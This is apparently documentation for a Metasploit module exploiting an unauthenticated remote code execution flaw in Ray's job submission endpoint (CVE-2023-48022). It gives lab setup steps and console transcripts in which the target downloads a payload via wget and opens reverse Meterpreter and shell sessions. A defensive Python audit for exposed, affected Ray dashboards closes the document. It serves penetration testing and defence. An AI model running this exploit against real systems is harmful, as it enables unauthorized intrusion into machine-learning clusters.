## Vulnerable Application

Ray (<=v2.6.3) is vulnerable to RCE via the agent job submission endpoint (CVE-2023-48022)

The vulnerability affects:

* Ray (<=v2.6.3)

This module was successfully tested on:

* Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15

### Install and run the vulnerable Ray (v2.6.3)

1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
2. Install Kali Linux (or other Linux distro) in your virtualization engine.
3. Pull pre-built Ray docker container (v2.6.3) in your VM.
   `docker pull rayproject/ray:2.6.3`
4. Start the ray container.
   `docker run --shm-size=512M -it -p 8265:8265 rayproject/ray:2.6.3`
5. Start ray.
   `ray start --head --dashboard-host=0.0.0.0`

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/ray_agent_job_rce`
4. Do: `set rhost `
5. Do: `set lhost `
6. Do: `run`
7. You should get a shell or meterpreter

## Options

No options

## Scenarios

### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (target 0)

```
msf > use exploit/linux/http/ray_agent_job_rce
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf exploit(linux/http/ray_agent_job_rce) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf exploit(linux/http/ray_agent_job_rce) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(linux/http/ray_agent_job_rce) > check
[*] 192.168.56.6:8265 - The service is running, but could not be validated.
msf exploit(linux/http/ray_agent_job_rce) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[+] Command execution successful.
Job ID: 'raysubmit_EJDSK2BrhAP8j69n' Submission ID: 'raysubmit_EJDSK2BrhAP8j69n'
[*] Using URL: http://192.168.56.1:8080/kOZWO5HA3wWm2Hh
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /kOZWO5HA3wWm2Hh
[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (3045380 bytes) to 192.168.56.6
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:42052) at 2024-08-10 10:45:48 +0900
[*] Server stopped.

meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Ubuntu 20.04 (Linux 6.6.15-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
```

### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (target 1)

```
msf > use exploit/linux/http/ray_agent_job_rce
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf exploit(linux/http/ray_agent_job_rce) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf exploit(linux/http/ray_agent_job_rce) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(linux/http/ray_agent_job_rce) > set target 1
target => 1
msf exploit(linux/http/ray_agent_job_rce) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf exploit(linux/http/ray_agent_job_rce) > check
[*] 192.168.56.6:8265 - The service is running, but could not be validated.
msf exploit(linux/http/ray_agent_job_rce) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[+] Command execution successful.
Job ID: 'raysubmit_RNpiJJt2feNrUrwN' Submission ID: 'raysubmit_RNpiJJt2feNrUrwN'
[*] Using URL: http://192.168.56.1:8080/QtpKXmqA8kq
[*] Command Stager progress - 100.00% done (116/116 bytes)
[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /QtpKXmqA8kq
[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (36 bytes) to 192.168.56.6
[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:35136) at 2024-08-10 10:47:37 +0900
[*] Server stopped.

whoami
ray
pwd
/home/ray
```
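
The lab setup above is reachable because the dashboard is started with `--dashboard-host=0.0.0.0` and the container publishes port 8265. The following audit is an added example, not part of the module or of Ray: it flags those two settings and the affected version range in inventory strings. The function names, the plain `X.Y.Z` version format, and the treatment of a missing `--dashboard-host` flag as loopback-only are assumptions.

```python
import shlex

AFFECTED_MAX = (2, 6, 3)      # page: Ray <= v2.6.3 is affected
DASHBOARD_PORT = "8265"       # port published by the page's docker run command
LOOPBACK = {"127.0.0.1", "localhost", "::1"}

def flag_value(argv, name):
    """Return the value of --name=VALUE or --name VALUE, else None."""
    for i, arg in enumerate(argv):
        if arg.startswith(name + "="):
            return arg.split("=", 1)[1]
        if arg == name and i + 1 < len(argv):
            return argv[i + 1]
    return None

def published_beyond_loopback(docker_cmd, port=DASHBOARD_PORT):
    """True if a -p/--publish mapping exposes `port` without a loopback bind IP."""
    argv = shlex.split(docker_cmd)
    for i, arg in enumerate(argv):
        if arg in ("-p", "--publish") and i + 1 < len(argv):
            spec = argv[i + 1]
        elif arg.startswith("--publish="):
            spec = arg.split("=", 1)[1]
        else:
            continue
        parts = spec.split("/")[0].rsplit(":", 2)   # [ip:][host_port:]container_port
        if parts[-1] == port and (len(parts) < 3 or parts[0].strip("[]") not in LOOPBACK):
            return True
    return False

def audit(version, ray_cmd, docker_cmd=""):
    """Return a list of findings for one Ray head node."""
    findings = []
    if tuple(int(x) for x in version.split(".")[:3]) <= AFFECTED_MAX:
        findings.append("version in affected range (<= 2.6.3)")
    host = flag_value(shlex.split(ray_cmd), "--dashboard-host")
    if host is not None and host not in LOOPBACK:   # no flag: assumed loopback-only
        findings.append("dashboard bound to non-loopback host " + host)
    if docker_cmd and published_beyond_loopback(docker_cmd):
        findings.append("port 8265 published beyond loopback")
    return findings

if __name__ == "__main__":
    # Inventory strings taken from the lab setup steps on this page.
    for finding in audit("2.6.3", "ray start --head --dashboard-host=0.0.0.0",
                         "docker run --shm-size=512M -it -p 8265:8265 rayproject/ray:2.6.3"):
        print("[!]", finding)
```

An empty result only means none of these three conditions matched; it does not show that the job submission endpoint is unreachable through another path such as a proxy or host networking.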